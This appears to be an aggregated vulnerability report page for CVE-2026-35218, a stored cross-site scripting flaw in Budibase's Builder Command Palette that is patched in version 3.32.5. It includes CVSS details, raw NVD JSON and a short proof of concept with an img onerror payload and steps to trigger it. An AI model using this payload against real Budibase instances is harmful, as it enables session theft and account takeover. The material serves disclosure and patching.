Security Vulnerability Report
中文
CVE-2026-35218 CVSS 8.7 HIGH

CVE-2026-35218

Published: 2026-04-03 16:16:42
Last Modified: 2026-04-08 21:18:49
Source: [email protected]

Description

Budibase is an open-source low-code platform. Prior to version 3.32.5, Budibase's Builder Command Palette renders entity names (tables, views, queries, automations) using Svelte's {@html} directive without any sanitization. An authenticated user with Builder access can create a table, automation, view, or query whose name contains an HTML payload (e.g. <img src=x onerror=alert(document.domain)>). When any Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the payload executes in their browser, stealing their session cookie and enabling full account takeover. This issue has been patched in version 3.32.5.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:* - VULNERABLE
Budibase < 3.32.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-35218 1. Login to Budibase as a user with Builder access. 2. Navigate to create a new Table or Automation. 3. In the 'Name' field, enter the following payload: --> <img src=x onerror=alert(document.domain)> <!-- 4. Save the entity. 5. Open the Command Palette using Ctrl+K. 6. The JavaScript alert will execute, demonstrating the XSS vulnerability. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35218", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:41.977", "lastModified": "2026-04-08T21:18:49.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Budibase is an open-source low-code platform. Prior to version 3.32.5, Budibase's Builder Command Palette renders entity names (tables, views, queries, automations) using Svelte's {@html} directive without any sanitization. An authenticated user with Builder access can create a table, automation, view, or query whose name contains an HTML payload (e.g. <img src=x onerror=alert(document.domain)>). When any Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the payload executes in their browser, stealing their session cookie and enabling full account takeover. This issue has been patched in version 3.32.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.32.5", "matchCriteriaId": "500AAF3C-F561-4FCA-BC90-A6E771514C5D"}]}]}], "references": [{"url": "https://github.com/Budibase/budibase/commit/c9ccf0c19e5849f1bda96401aa33f97c99cd8cd6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Budibase/budibase/pull/18243", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/Budibase/budibase/releases/tag/3.32.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-gp5x-2v54-v2q5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.